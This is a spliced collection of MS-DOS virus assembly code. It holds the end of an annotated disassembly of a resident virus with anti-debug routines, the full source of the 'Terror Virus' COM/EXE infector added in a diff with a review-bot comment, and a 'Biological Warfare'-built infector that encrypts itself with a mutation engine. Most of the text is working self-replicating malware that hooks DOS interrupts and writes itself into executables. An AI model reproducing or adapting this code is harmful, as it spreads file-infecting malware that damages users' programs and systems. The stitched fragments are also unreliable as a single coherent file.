|
||||
pop es ;17D0 07
|
||||
jz l_181A ;-> allready resident ;17D1 74 47
|
||||
mov bx,es:[84h] ;int 21h - offset ;17D3 26: 8B 1E 0084
|
||||
mov ax,es:[86h] ;int 21h - segment ;17D8 26: A1 0086
|
||||
mov word ptr ds:[549h],ax ;l_18C9 ;17DC A3 0549
|
||||
mov word ptr ds:[49Fh],ax ;l_181F ;17DF A3 049F
|
||||
mov di,bx ;17E2 8B FB
|
||||
mov es,ax ;17E4 8E C0
|
||||
mov cx,80h ;17E6 B9 0080
|
||||
mov al,80h ;17E9 B0 80
|
||||
l_17EB: repne scasb ;find byte 80h ;17EB F2/ AE
|
||||
cmp cx,0 ;17ED 83 F9 00
|
||||
je l_1870 ;-> not found, EXIT ;17F0 74 7E
|
||||
cmp byte ptr es:[di],0FCh ;17F2 26: 80 3D FC
|
||||
jne l_17EB ;-> find another place ;17F6 75 F3
|
||||
|
||||
;<- get four bytes from int 21h service
|
||||
mov al,es:[di+2] ;17F8 26: 8A 45 02
|
||||
mov byte ptr cs:[42Bh],al ;l_17AB ;17FC 2E: A2 042B
|
||||
mov al,es:[di-1] ;1800 26: 8A 45 FF
|
||||
mov byte ptr cs:[428h],al ;l_17A8 ;1804 2E: A2 0428
|
||||
mov al,es:[di] ;1808 26: 8A 05
|
||||
mov byte ptr cs:[429h],al ;l_17A8+1 ;180B 2E: A2 0429
|
||||
mov al,es:[di+1] ;180F 26: 8A 45 01
|
||||
mov byte ptr cs:[42Ah],al ;l_17A8+2 ;1813 2E: A2 042A
|
||||
jmp short l_1821 ;1817 EB 08
|
||||
nop ;1819 90
|
||||
|
||||
;<- allready resident
|
||||
l_181A: jmp short l_1870 ;-> EXIT ;181A EB 54
|
||||
nop ;181C 90
|
||||
|
||||
d_049D dw 140Dh ;address to jump1 into ;181D 0D 14
|
||||
d_049F dw 0278h ;old int 21h segment ;181F 78 02
|
||||
|
||||
l_1821: mov ax,di ;1821 8B C7
|
||||
add ax,4 ;next to conditional jmp;1823 05 0004
|
||||
xor bx,bx ;1826 33 DB
|
||||
mov bl,es:[di+3] ;jump length ;1828 26: 8A 5D 03
|
||||
add ax,bx ;jump address ;182C 03 C3
|
||||
mov word ptr ds:[49Dh],ax ;l_181D ;182E A3 049D
|
||||
cmp byte ptr es:[di+3],80h ;1831 26: 80 7D 03 80
|
||||
jb l_183E ;-> forward jump ;1836 72 06
|
||||
;<- jump backwards
|
||||
sub ax,100h ;minus carry ;1838 2D 0100
|
||||
mov word ptr ds:[49Dh],ax ;l_181D ;183B A3 049D
|
||||
l_183E: add di,4 ;second condition addrs ;183E 83 C7 04
|
||||
mov word ptr ds:[547h],di ;1841 89 3E 0547
|
||||
sub di,5 ;<- area to substitute ;1845 83 EF 05
|
||||
push es ;1848 06
|
||||
push di ;1849 57
|
||||
mov dx,9800h ;resident virus segment ;184A BA 9800
|
||||
mov word ptr cs:[4F5h],dx ;184D 2E: 89 16 04F5
|
||||
mov es,dx ;1852 8E C2
|
||||
xor si,si ;1854 33 F6
|
||||
xor di,di ;1856 33 FF
|
||||
mov cx,612h ;l_1380 -> l_1992 ;1858 B9 0612
|
||||
rep movsb ;copy virus code ;185B F3/ A4
|
||||
|
||||
;<----- take control over int 21h
|
||||
lea cx,cs:[413h] ;offset l_1793 ;185D 8D 0E 0413
|
||||
mov word ptr ds:[4F3h],cx ;1861 89 0E 04F3
|
||||
pop di ;1865 5F
|
||||
pop es ;1866 07
|
||||
mov cx,5 ;1867 B9 0005
|
||||
lea si,cs:[4F2h] ;offset l_1792 ;186A 8D 36 04F2
|
||||
rep movsb ;186E F3/ A4
|
||||
l_1870: sti ;1870 FB
|
||||
retn ;1871 C3
|
||||
s_17BB endp
|
||||
|
||||
;<---- instruction pattern to write over int 21h code
|
||||
d_04F2 db 0EAh ;JMP FAR 9800:l_1793 ;1872 EA
|
||||
d_04F3 dw 0 ;:= offset l_1793 ;1873 00 00
|
||||
d_04F5 dw 9800h ;resident virus segment ;1875 00 98
|
||||
|
||||
;================================================
|
||||
; saved 32 victim bytes
|
||||
;------------------------------------------------
|
||||
d_04F7 db 0E9h,0FFh,11h ;1877 E9 FF 11
|
||||
db 'Converted',0,0,0,0 ;187A 43 6F 6E 76 65 72
|
||||
;1880 74 65 64 00 00 00 00
|
||||
db 'MZ' ;1887 4D 5A
|
||||
db 0EAh,01h,09h,00h,08h,00h ;1889 EA 01 09 00 08 00
|
||||
db 20h,00h,00h,00h,0FFh,0FFh ;188F 20 00 00 00 FF FF
|
||||
db 98h,00h ;1895 98 00 00
|
||||
|
||||
;-----------------------------------
|
||||
db 48 dup (0) ;not used ;1897 0030[00]
|
||||
|
||||
d_0547 dw 146Ch ;address to jump2 into ;18C7 6C 14
|
||||
d_0549 dw 0278h ;old int 21h segment ;18C9 78 02
|
||||
|
||||
;<------ code writed to in case of paragraf alignement
|
||||
db 0E9h ;jmp l_18CF ;18CB E9
|
||||
d_054C dw 052Ch ;distance of jump ;18CC 2C 05
|
||||
db 0 ;18CE 00
|
||||
|
||||
;================================================================
|
||||
; EXE virus entry
|
||||
;----------------------------------------------------------------
|
||||
l_18CF: push bx ;18CF 53
|
||||
push cx ;18D0 51
|
||||
push es ;18D1 06
|
||||
push ds ;18D2 1E
|
||||
pushf ;18D3 9C
|
||||
mov ax,cs ;18D4 8C C8
|
||||
mov ds,ax ;18D6 8E D8
|
||||
call s_1938 ;make virus resident ;18D8 E8 005D
|
||||
cmp byte ptr ds:[349h],0FFh ;l_16C9 (0FFh=COM) ;18DB 80 3E 0349 FF
|
||||
je l_18E5 ;18E0 74 03
|
||||
jmp short l_1953 ;-> ? ;18E2 EB 6F
|
||||
nop ;18E4 90
|
||||
|
||||
;================================================================
|
||||
; End of virus code - file *.COM
|
||||
;----------------------------------------------------------------
|
||||
l_18E5: popf ;18E5 9D
|
||||
pop ds ;18E6 1F
|
||||
pop es ;18E7 07
|
||||
pop cx ;18E8 59
|
||||
pop bx ;18E9 5B
|
||||
mov word ptr cs:[5B4h],100h ;l_1934 = victim IP ;18EA 2E: C7 06 05B4 0100
|
||||
mov ax,es ;18F1 8C C0
|
||||
mov word ptr cs:[5B6h],ax ;l_1936 = victim CS ;18F3 2E: A3 05B6
|
||||
call s_16CA ;init registers ;18F7 E8 FDD0
|
||||
jmp dword ptr cs:[5B4h] ;l_1934 -> run victim ;18FA 2E: FF 2E 05B4
|
||||
|
||||
;<--- victim name
|
||||
d_057F db 'A:\SYS.COM' ;18FF 41 3A 5C 53 59 53
|
||||
;1905 2E 43 4F 4D
|
||||
db 0,'XE',0,'E',0 ;1909 00 58 45 00 45 00
|
||||
db 9 dup (0) ;190F 0009[00]
|
||||
|
||||
;================================================================
|
||||
; ANTYDEBUG - make virus resident
|
||||
;----------------------------------------------------------------
|
||||
s_1918 proc near
|
||||
cmp ax,3000h ;1918 3D 3000
|
||||
jne l_1925 ;-> int 3 ;191B 75 08
|
||||
call s_17BB ;-> make virus resident ;191D E8 FE9B
|
||||
retn ;1920 C3
|
||||
s_1918 endp
|
||||
|
||||
d_05A1 dw 002Ah ;victim SS (rel) ;1921 2A 00
|
||||
d_05A3 dw 1388h ;victim SP ;1923 88 13
|
||||
|
||||
;================================================================
|
||||
; ANTYDEBUG - call int 3 (Breakpoint)
|
||||
;----------------------------------------------------------------
|
||||
s_1925 proc near
|
||||
l_1925: mov ax,3000h ;Flag register ;1925 B8 3000
|
||||
push ax ;1928 50
|
||||
l_1929: call dword ptr es:[0Ch] ;int 3 (Breakpoint) ;1929 26: FF 1E 000C
|
||||
cmp ax,3000h ;192E 3D 3000
|
||||
jne l_1929 ;1931 75 F6
|
||||
retn ;1933 C3
|
||||
s_1925 endp
|
||||
|
||||
d_05B4 dw 0000h ;victim IP ;1934 00 00
|
||||
d_05B6 dw 000Bh ;victim CS (rel) ;1936 0B 00
|
||||
|
||||
;================================================================
|
||||
; Make virus resident
|
||||
;----------------------------------------------------------------
|
||||
s_1938 proc near
|
||||
push es ;1938 06
|
||||
call s_1948 ;-> INT 1 (single step) ;1939 E8 000C
|
||||
cmp ax,0 ;193C 3D 0000
|
||||
jne l_1947 ;193F 75 06
|
||||
call s_1925 ;-> INT 3 (Breakpoint) ;1941 E8 FFE1
|
||||
call s_1918 ;-> reside virus ;1944 E8 FFD1
|
||||
l_1947: pop es ;1947 07
|
||||
|
||||
;================================================================
|
||||
; ANTYDEBUG - call int 1 = Single Step
|
||||
;----------------------------------------------------------------
|
||||
s_1948: pushf ;1948 9C
|
||||
xor ax,ax ;1949 33 C0
|
||||
mov es,ax ;194B 8E C0
|
||||
call dword ptr es:[4h] ;int 1 ;194D 26: FF 1E 0004
|
||||
retn ;1952 C3
|
||||
s_1938 endp
|
||||
|
||||
;================================================================
|
||||
; End of virus code - file *.EXE
|
||||
;----------------------------------------------------------------
|
||||
l_1953: popf ;1953 9D
|
||||
pop ds ;1954 1F
|
||||
pop es ;1955 07
|
||||
pop cx ;1956 59
|
||||
pop bx ;1957 5B
|
||||
mov ax,es ;1958 8C C0
|
||||
add ax,10h ;relocating value ;195A 05 0010
|
||||
mov dx,ax ;195D 8B D0
|
||||
mov bp,word ptr cs:[5A1h] ;l_1921 = victim SS ;195F 2E: 8B 2E 05A1
|
||||
add bp,ax ;1964 03 E8
|
||||
mov ss,bp ;1966 8E D5
|
||||
mov bp,word ptr cs:[5A3h] ;l_1923 = victim SP ;1968 2E: 8B 2E 05A3
|
||||
mov sp,bp ;196D 8B E5
|
||||
mov ax,dx ;196F 8B C2
|
||||
add word ptr cs:[5B6h],ax ;l_1936 - CS relocation ;1971 2E: 01 06 05B6
|
||||
call s_16CA ;init registers ;1976 E8 FD51
|
||||
jmp dword ptr cs:[5B4h] ;-> run victim ;1979 2E: FF 2E 05B4
|
||||
|
||||
db 20 dup (0) ;COM file stack ;197E 0014[00]
|
||||
|
||||
d_0612 label byte ;1992h
|
||||
|
||||
seg_a ends
|
||||
|
||||
end start
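--- /dev/null
+++ b/PATH_NOT_SHOWN
@@ -0,0 +1,492 @@
+;**********************************************
+; Terror Virus
+;**********************************************
+
+Code Segment
+Assume CS:Code
+Org 100h
+
+Start: jmp short Begin
+
+Table310 dw 12E4h,09ABh
+Table320 dw 138Dh,17D0h
+Table330 dw 1460h,0F7Ah
+
+FileBytes dw 12 dup (9090h)
+
+ComSpec db 'A:\COMMAND.COM',0
+
+CheckEXE: cmp cs:FileBytes,4D5Ah
+je IsEXE
+cmp cs:FileBytes,5A4Dh
+IsEXE: ret
+
+Begin: mov word ptr cs:PSPSeg,ds
+push ax
+mov ax,0EC59h
+int 21h
+cmp bp,ax
+jnz Install
+push cs
+pop ds
+StartFile: pop ax
+mov es,word ptr cs:PSPSeg
+call CheckEXE
+je ExeFileStart
+mov cx,13
+mov si,offset FileBytes
+push es
+mov di,100h
+push di
+rep movsb
+push es
+pop ds
+retf
+ExeFileStart: mov si,es
+add si,10h
+add cs:FileBytes [16h],si
+add si,cs:FileBytes [0Eh]
+mov di,cs:FileBytes [10h]
+push es
+pop ds
+cli
+mov ss,si
+mov sp,di
+sti
+jmp dword ptr cs:FileBytes [14h]
+
+Install: mov ah,30h
+int 21h
+mov bx,offset Table310
+cmp ax,0A03h
+jne Not310
+mov ax,0070h
+mov bx,0D43h
+mov es,ax
+cmp byte ptr es:[bx],2Eh ; CS prefix
+jne SetVectors
+mov ax,bx
+jmp short SetV1
+Not310: add bx,4
+cmp ax,1403h
+je SetVectors
+add bx,4
+cmp ax,1E03h
+je SetVectors
+mov ax,3513h
+int 21h
+mov word ptr cs:True13, bx
+mov word ptr cs:True13 + 2,es
+mov ax,3521h
+mov dx,bx
+jmp short Set21
+SetVectors: mov ax,word ptr cs:[bx+2]
+SetV1: mov dx,word ptr cs:[bx]
+mov word ptr cs:True13,ax
+mov word ptr cs:True13 + 2,0070h
+mov ah,34h
+int 21h
+Set21: push es
+pop ds
+mov ax,25ECh
+int 21h
+mov ax,word ptr cs:PSPSeg
+mov es,ax
+dec ax
+mov ds,ax
+mov bx,word ptr ds:[3]
+sub bx,101
+add ax,bx
+mov word ptr es:[0002h],ax ; Setup PSP memory size.
+; Command.COM needs that
+; action; else the system
+; hangs.
+mov ah,4Ah
+int 0ECh
+mov bx,100
+mov ah,48h
+int 0ECh
+sub ax,10h
+mov es,ax
+mov byte ptr ds:[0000h],5Ah ; This is the last block,
+; don't you think so?
+push cs
+pop ds
+mov si,100h
+mov di,si
+mov cx,MovedSize
+rep movsb
+mov di,offset Continue
+push es
+push di
+retf
+
+Continue: mov word ptr es:[0F1h],0070h
+mov ax,3521h
+int 0ECh
+mov word ptr cs:Saved21, bx
+mov word ptr cs:Saved21 + 2,es
+mov ah,25h
+mov dx,offset Int21
+push cs
+pop ds
+int 0ECh
+push cs
+pop es
+mov di,offset Handles
+mov cx,25
+mov al,0
+rep stosb
+jmp StartFile
+
+Respond: mov bp,ax
+iret
+
+Int21: cmp ax,0EC59h
+je Respond
+cmp ax,4B00h
+je Exec
+cmp ah,3Dh
+je Open
+cmp ah,3Eh
+je Close
+cmp ah,11h
+jne End21
+push di
+mov di,dx
+cmp byte ptr ds:[di+6],08 ; Volume ID attributes
+je Find1st
+EndF1st: pop di
+End21: db 0EAh
+Saved21 dd ?
+Exec: call InfectName
+jmp End21
+OpenEnd: pop cx
+jmp End21
+Open: push cx
+call GetAttr
+jc OpenEnd
+cmp cx,20h
+pop cx
+jne End21
+mov al,2
+pushf
+call dword ptr cs:Saved21
+jc Err21
+push ax
+push bx
+mov bx,ax
+mov al,byte ptr cs:Command?
+mov byte ptr cs:Handles [bx],al
+pop bx
+pop ax
+Err21: retf 2
+Close: cmp byte ptr cs:Handles [bx],0
+jz End21
+push ax
+mov al,byte ptr cs:Handles [bx]
+mov byte ptr cs:Command?,al
+mov byte ptr cs:Handles [bx],0
+mov ah,45h
+int 0ECh
+mov word ptr cs:TempHandle,ax
+pop ax
+jc End21
+pushf
+call dword ptr cs:Saved21
+jc Err21
+push bx
+mov bx,word ptr cs:TempHandle
+push ds
+call SetV
+call InfectHandle
+call Restore
+pop ds
+pop bx
+clc
+retf 2
+Find1st: push ax
+push dx
+push ds
+mov al,byte ptr ds:[di+7]
+mov dx,offset Comspec
+or al,al
+jz CurrentDrive
+add al,'A'-1
+mov byte ptr cs:Comspec,al
+jmp short Infect1st
+CurrentDrive: add dx,2
+Infect1st: push cs
+pop ds
+call InfectName
+pop ds
+pop dx
+pop ax
+jmp EndF1st
+
+InfectName: push ax
+push bx
+push cx
+call GetAttr
+jc EndIN0
+push cx
+push ds
+call SetV
+pop ds
+mov ax,4301h
+xor cx,cx
+int 0ECh
+jc EndIN1
+mov ax,3D02h
+int 0ECh
+mov bx,ax
+EndIN1: pop cx
+jc EndInfName
+call InfectHandle
+mov ax,4301h
+int 0ECh
+EndInfName: call Restore
+EndIN0: pop cx
+pop bx
+pop ax
+ret
+
+SetV: push ax
+push dx
+push bx
+push es
+mov ax,3513h
+int 0ECh
+mov word ptr cs:Old13,bx
+mov word ptr cs:Old13+2,es
+mov al,24h
+int 0ECh
+mov word ptr cs:Old24,bx
+mov word ptr cs:Old24+2,es
+pop es
+pop bx
+push cs
+pop ds
+mov dx,offset Critical
+mov ah,25h
+int 0ECh
+mov dx,offset Int13
+mov al,13h
+int 0ECh
+pop dx
+pop ax
+ret
+
+InfectHandle: push ax
+push cx
+push dx
+push si
+push di
+push ds
+mov di,offset FileBytes
+mov cx,0FFFFh
+mov dx,-6
+mov ax,4202h
+int 0ECh
+mov ah,3Fh
+mov cx,6
+push cs
+pop ds
+mov dx,di
+int 0ECh
+jc EndH1
+cmp word ptr cs:[di],'eT'
+je EndH1
+xor cx,cx
+xor dx,dx
+mov ax,4200h
+int 0ECh
+mov ah,3Fh
+mov cx,24
+mov dx,di
+int 0ECh
+jnc ReadOk
+EndH1: jmp EndInfHandle
+ReadOk: xor cx,cx
+xor dx,dx
+cmp byte ptr cs:Command?,2
+jne Seek
+cmp word ptr ds:[di+1],4000h ; Is there some
+; another virus
+; in the stack?
+ja EndH1
+dec cx
+mov dx,-(VirusSize+64)
+Seek: mov ax,4202h
+Seek1: int 0ECh
+test ax,000Fh
+jz SeekOk
+mov cx,dx
+mov dx,ax
+add dx,10h
+and dl,0F0h
+mov ax,4200h
+jmp Seek1
+SeekOk: call CheckEXE
+je SkipEXE
+or dx,dx
+jnz EndH1
+cmp ax,1024
+jnb MayBeGood?
+jmp EndInfHandle
+MayBeGood?: cmp ax,64000
+ja EndInfHandle
+SkipEXE: mov cl,4
+shr ax,cl
+mov si,ax
+mov cl,12
+shl dx,cl
+add si,dx
+mov ah,40h
+mov dx,100h
+mov cx,VirusSize
+int 0ECh
+jc EndInfHandle
+call CheckEXE
+jne ComFile
+sub si,10h
+sub si,word ptr cs:[di+08h]
+mov word ptr cs:[di+14h],100h
+mov word ptr cs:[di+16h],si
+mov word ptr cs:[di+10h],400h
+add si,VirusSize / 16 + 1
+mov word ptr cs:[di+0Eh],si
+mov ax,4202h
+xor cx,cx
+xor dx,dx
+int 0ECh
+mov cx,200h
+div cx
+or dx,dx
+jz DontAdjust
+inc ax
+DontAdjust: mov word ptr cs:[di+02h],dx
+mov word ptr cs:[di+04h],ax
+jmp short Common
+ComFile: push si
+push di
+push es
+push cs
+pop es
+mov si,offset ComHeader
+mov cx,11
+rep movsb
+pop es
+pop di
+pop ds:[di+11]
+Common: mov ax,4200h
+xor cx,cx
+xor dx,dx
+int 0ECh
+mov ah,40h
+mov cx,24
+mov dx,di
+int 0ECh
+EndInfHandle: mov ax,5700h
+int 0ECh
+mov al,1
+int 0ECh
+mov ah,3Eh
+int 0ECh
+pop ds
+pop di
+pop si
+pop dx
+pop cx
+pop ax
+ret
+
+Restore: push ax
+push dx
+push ds
+mov ax,2513h
+mov dx,word ptr cs:Old13
+mov ds,word ptr cs:Old13+2
+int 0ECh
+mov al,24h
+mov dx,word ptr cs:Old24
+mov ds,word ptr cs:Old24+2
+pop ds
+pop dx
+pop ax
+ret
+
+GetAttr: push ax
+push es
+push di
+push bx
+mov di,dx
+push ds
+pop es
+mov al,0
+mov cx,64
+repne scasb
+mov ax,word ptr ds:[di-3]
+mov cx,word ptr ds:[di-5]
+and ax,5F5Fh ; Upcase extension
+and ch,5Fh
+cmp ax,'MO'
+jne Exe?
+cmp cx,'C.'
+je CommandChk
+ErrAttr: stc
+jmp short EndAttr
+Exe?: cmp ax,'EX'
+jne ErrAttr
+cmp cx,'E.'
+jne ErrAttr
+CommandChk: mov cx,7
+mov bx,-1
+Loop0: inc bx
+mov al,byte ptr ds:[bx+di-12]
+and al,5Fh
+cmp al,byte ptr cs:Comspec [bx+3]
+loope Loop0
+mov al,1
+jne NoCommand
+mov al,2
+NoCommand: mov byte ptr cs:Command?,al
+mov ax,4300h
+int 0ECh
+EndAttr: pop bx
+pop di
+pop es
+pop ax
+ret
+
+Critical: mov al,3
+iret
+
+Int13: cmp ah,3
+jz Skip13
+db 0EAh ; JMP Far
+Old13 dd ?
+Skip13: db 0EAh
+True13 dd ?
+
+ComHeader db 50h,8Ch,0C8h,01h,06h,0Bh,01h,58h,0EAh,00h,01h
+
+Terror db ' Terror'
+
+VirusEnd label byte
+
+VirusSize = offset VirusEnd - offset Start
+
+Old24 dd ?
+
+TempHandle label word
+PSPSeg dw ?
+
+MovedSize = $ - offset Start
+
+Handles db 25 dup (?)
+
+Command? db ?
+
+Code EndS
+End Start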
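Review bot: The file has no header comment stating that, after `Set21` executes `mov ax,25ECh` / `int 21h`, vector 0ECh holds the original DOS int 21h entry, so every later `int 0ECh` in `InfectName`, `InfectHandle`, `GetAttr` and `Restore` is a plain DOS call that bypasses the file's own `Int21` hook; a reader can only reconstruct that by tracing the `Set21` lines. For analysts it is also worth documenting on `Restore` that only the int 13h vector is actually re-installed: the `mov al,24h` / `mov dx,word ptr cs:Old24` / `mov ds,word ptr cs:Old24+2` lines are followed directly by `pop ds`, so the `Critical` stub that `SetV` placed in the int 24h vector stays there after each infection attempt, a persistent artifact visible in a memory image. Suggest a file-level comment such as `; int 0ECh = original DOS int 21h, re-vectored at Set21; all file I/O below goes through it` and, on `Restore`, `; only int 13h is restored here; the int 24h vector still points at Critical`.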
@ -0,0 +1,379 @@
|
|||
; test1.asm : Test virus #1
|
||||
; Created with Biological Warfare - Version 0.90á by MnemoniX
|
||||
|
||||
PING equ 0F43Fh
|
||||
PONG equ 0B1DEh
|
||||
STAMP equ 26
|
||||
MARKER equ 07070h
|
||||
|
||||
code segment
|
||||
org 0
|
||||
assume cs:code,ds:code
|
||||
|
||||
start:
|
||||
db 0E9h,3,0 ; to virus
|
||||
host:
|
||||
db 0CDh,20h,0 ; host program
|
||||
virus_begin:
|
||||
push ds es
|
||||
|
||||
call $ + 3 ; BP is instruction ptr.
|
||||
pop bp
|
||||
sub bp,offset $ - 1
|
||||
|
||||
xor ax,ax ; mild anti-trace code
|
||||
mov es,ax ; kill interrupts 1 & 3
|
||||
mov di,6
|
||||
stosw
|
||||
mov di,14
|
||||
stosw
|
||||
|
||||
in al,21h ; lock out & reopen keyboard
|
||||
xor al,2
|
||||
out 21h,al
|
||||
xor al,2
|
||||
out 21h,al
|
||||
|
||||
mov ax,PING ; test for residency
|
||||
int 21h
|
||||
cmp bx,PONG
|
||||
je installed
|
||||
|
||||
mov ax,es ; Get PSP
|
||||
dec ax
|
||||
mov ds,ax ; Get MCB
|
||||
|
||||
sub word ptr ds:[3],((MEM_SIZE+1023) / 1024) * 64
|
||||
sub word ptr ds:[12h],((MEM_SIZE+1023) / 1024) * 64
|
||||
mov es,word ptr ds:[12h]
|
||||
|
||||
push cs ; copy virus into memory
|
||||
pop ds
|
||||
xor di,di
|
||||
mov si,bp
|
||||
mov cx,(virus_end - start) / 2 + 1
|
||||
rep movsw
|
||||
|
||||
xor ax,ax ; capture interrupts
|
||||
mov ds,ax
|
||||
|
||||
mov si,21h * 4 ; get original int 21
|
||||
mov di,offset old_int_21
|
||||
movsw
|
||||
movsw
|
||||
|
||||
mov word ptr ds:[si - 4],offset new_int_21
|
||||
mov ds:[si - 2],es ; and set new int 21
|
||||
|
||||
installed:
|
||||
pop es ds ; restore segregs
|
||||
cmp sp,MARKER ; check for .EXE
|
||||
je exe_exit
|
||||
|
||||
com_exit:
|
||||
mov si,[bp + mutator] ; restore host program
|
||||
sub si,3
|
||||
mov di,100h
|
||||
push di
|
||||
movsw
|
||||
movsb
|
||||
|
||||
call fix_regs ; fix up registers
|
||||
ret ; and leave
|
||||
exe_exit:
|
||||
mov ax,ds ; fix up return address
|
||||
add ax,10h
|
||||
push ax
|
||||
add ax,cs:[bp + exe_cs]
|
||||
mov cs:[bp + return_cs],ax
|
||||
|
||||
mov ax,cs:[bp + exe_ip]
|
||||
mov cs:[bp + return_ip],ax
|
||||
|
||||
pop ax
|
||||
add ax,cs:[bp + exe_ss] ; restore stack
|
||||
cli
|
||||
mov ss,ax
|
||||
mov sp,cs:[bp + exe_sp]
|
||||
|
||||
call fix_regs ; fix up registers
|
||||
sti
|
||||
|
||||
db 0EAh ; back to host program
|
||||
return_ip dw 0
|
||||
return_cs dw 0
|
||||
|
||||
exe_cs dw -16 ; orig CS:IP
|
||||
exe_ip dw 103h
|
||||
exe_sp dw -2 ; orig SS:SP
|
||||
exe_ss dw -16
|
||||
|
||||
fix_regs:
|
||||
xor ax,ax
|
||||
cwd
|
||||
xor bx,bx
|
||||
mov si,100h
|
||||
xor di,di
|
||||
xor bp,bp
|
||||
ret
|
||||
|
||||
; interrupt 21 handler
|
||||
int_21:
|
||||
pushf
|
||||
call dword ptr cs:[old_int_21]
|
||||
ret
|
||||
|
||||
new_int_21:
|
||||
cmp ax,PING ; residency test
|
||||
je ping_pong
|
||||
cmp ah,3Dh ; file open
|
||||
je file_open
|
||||
cmp ax,4B00h ; execute program
|
||||
je execute
|
||||
int_21_exit:
|
||||
db 0EAh ; never mind ...
|
||||
old_int_21 dd 0
|
||||
|
||||
ping_pong:
|
||||
mov bx,PONG
|
||||
iret
|
||||
|
||||
file_open:
|
||||
push ax cx di es
|
||||
call get_extension
|
||||
cmp [di],'OC' ; .COM file?
|
||||
jne perhaps_exe ; perhaps .EXE then
|
||||
cmp byte ptr [di + 2],'M'
|
||||
jne not_prog
|
||||
jmp a_program
|
||||
perhaps_exe:
|
||||
cmp [di],'XE' ; .EXE file?
|
||||
jne not_prog
|
||||
cmp byte ptr [di + 2],'E'
|
||||
jne not_prog
|
||||
a_program:
|
||||
pop es di cx ax
|
||||
jmp execute ; infect file
|
||||
not_prog:
|
||||
pop es di cx ax
|
||||
jmp int_21_exit
|
||||
|
||||
execute:
|
||||
push ax bx cx dx si di ds es
|
||||
|
||||
xor ax,ax ; critical error handler
|
||||
mov es,ax ; routine - catch int 24
|
||||
mov es:[24h * 4],offset int_24
|
||||
mov es:[24h * 4 + 2],cs
|
||||
|
||||
mov ax,4300h ; change attributes
|
||||
int 21h
|
||||
|
||||
push cx dx ds
|
||||
xor cx,cx
|
||||
call set_attributes
|
||||
|
||||
mov ax,3D02h ; open file
|
||||
call int_21
|
||||
jnc open_it
|
||||
jmp cant_open
|
||||
open_it:
|
||||
xchg bx,ax
|
||||
|
||||
push cs ; CS = DS
|
||||
pop ds
|
||||
|
||||
mov ax,5700h ; save file date/time
|
||||
int 21h
|
||||
push cx dx
|
||||
and cl,31 ; check time stamp
|
||||
cmp cl,STAMP
|
||||
jnz its_ok
|
||||
jmp dont_infect
|
||||
its_ok:
|
||||
mov ah,3Fh
|
||||
mov cx,28
|
||||
mov dx,offset read_buffer
|
||||
int 21h
|
||||
|
||||
cmp word ptr read_buffer,'ZM' ; .EXE?
|
||||
jne its_ok_2
|
||||
jmp infect_exe
|
||||
its_ok_2:
|
||||
mov al,2 ; move to end of file
|
||||
call move_file_ptr
|
||||
|
||||
cmp dx,65279 - (VIRUS_SIZE + 3)
|
||||
ja dont_infect ; too big, don't infect
|
||||
|
||||
mov word ptr new_jump + 1,dx
|
||||
|
||||
add dx,103h
|
||||
mov mutator,dx
|
||||
push cs ; call Biological Warfare
|
||||
pop es ; Mutation Engine
|
||||
mov cx,VIRUS_SIZE
|
||||
mov di,offset encrypt_buffer
|
||||
mov si,offset virus_begin
|
||||
|
||||
call _bwme
|
||||
|
||||
push cx
|
||||
mov cx,3
|
||||
mov ah,40h
|
||||
mov dx,offset read_buffer ; save original program head
|
||||
int 21h
|
||||
|
||||
mov ah,40h ; write virus to file
|
||||
pop cx
|
||||
mov dx,offset encrypt_buffer
|
||||
int 21h
|
||||
|
||||
xor al,al ; back to beginning of file
|
||||
call move_file_ptr
|
||||
|
||||
mov dx,offset new_jump ; and write new jump
|
||||
int 21h
|
||||
|
||||
fix_date_time:
|
||||
pop dx cx
|
||||
and cl,-32 ; add time stamp
|
||||
or cl,STAMP
|
||||
mov ax,5701h ; restore file date/time
|
||||
int 21h
|
||||
|
||||
close:
|
||||
pop ds dx cx ; restore attributes
|
||||
call set_attributes
|
||||
|
||||
mov ah,3Eh ; close file
|
||||
int 21h
|
||||
|
||||
cant_open:
|
||||
pop es ds di si dx cx bx ax
|
||||
jmp int_21_exit ; leave
|
||||
|
||||
|
||||
set_attributes:
|
||||
mov ax,4301h
|
||||
int 21h
|
||||
ret
|
||||
|
||||
dont_infect:
|
||||
pop cx dx ; can't infect, skip
|
||||
jmp close
|
||||
|
||||
move_file_ptr:
|
||||
mov ah,42h ; move file pointer
|
||||
cwd
|
||||
xor cx,cx
|
||||
int 21h
|
||||
|
||||
mov dx,ax ; set up registers
|
||||
mov ah,40h
|
||||
mov cx,3
|
||||
ret
|
||||
infect_exe:
|
||||
cmp word ptr read_buffer[26],0
|
||||
jne dont_infect ; overlay, don't infect
|
||||
|
||||
cmp word ptr read_buffer[16],MARKER
|
||||
je dont_infect ; infected already
|
||||
|
||||
les ax,dword ptr read_buffer[20]
|
||||
mov exe_cs,es ; CS
|
||||
mov exe_ip,ax ; IP
|
||||
|
||||
les ax,dword ptr read_buffer[14]
|
||||
mov exe_ss,ax ; SS
|
||||
mov exe_sp,es ; SP
|
||||
mov word ptr read_buffer[16],MARKER
|
||||
|
||||
mov ax,4202h ; to end of file
|
||||
cwd
|
||||
xor cx,cx
|
||||
int 21h
|
||||
|
||||
push ax dx ; save file size
|
||||
|
||||
push bx
|
||||
mov cl,12 ; calculate offsets for CS
|
||||
shl dx,cl ; and IP
|
||||
mov bx,ax
|
||||
mov cl,4
|
||||
shr bx,cl
|
||||
add dx,bx
|
||||
and ax,15
|
||||
pop bx
|
||||
|
||||
sub dx,word ptr read_buffer[8]
|
||||
mov word ptr read_buffer[22],dx
|
||||
mov word ptr read_buffer[20],ax
|
||||
add dx,100
|
||||
mov word ptr read_buffer[14],dx
|
||||
|
||||
pop dx ax ; calculate prog size
|
||||
|
||||
add ax,VIRUS_SIZE + 3
|
||||
adc dx,0
|
||||
mov cx,512 ; in pages
|
||||
div cx ; then save results
|
||||
inc ax
|
||||
mov word ptr read_buffer[2],dx
|
||||
mov word ptr read_buffer[4],ax
|
||||
mov dx,word ptr read_buffer[20]
|
||||
mov cx,VIRUS_SIZE ; call BWME
|
||||
mov di,offset encrypt_buffer
|
||||
mov si,offset virus_begin
|
||||
push cs
|
||||
pop es
|
||||
|
||||
call _bwme
|
||||
|
||||
|
||||
mov ah,40h
|
||||
mov dx,offset encrypt_buffer
|
||||
int 21h
|
||||
|
||||
|
||||
mov ax,4200h ; back to beginning
|
||||
cwd
|
||||
xor cx,cx
|
||||
int 21h
|
||||
|
||||
mov ah,40h ; and fix up header
|
||||
mov cx,28
|
||||
mov dx,offset read_buffer
|
||||
int 21h
|
||||
jmp fix_date_time ; done
|
||||
|
||||
courtesy_of db '[BW]',0
|
||||
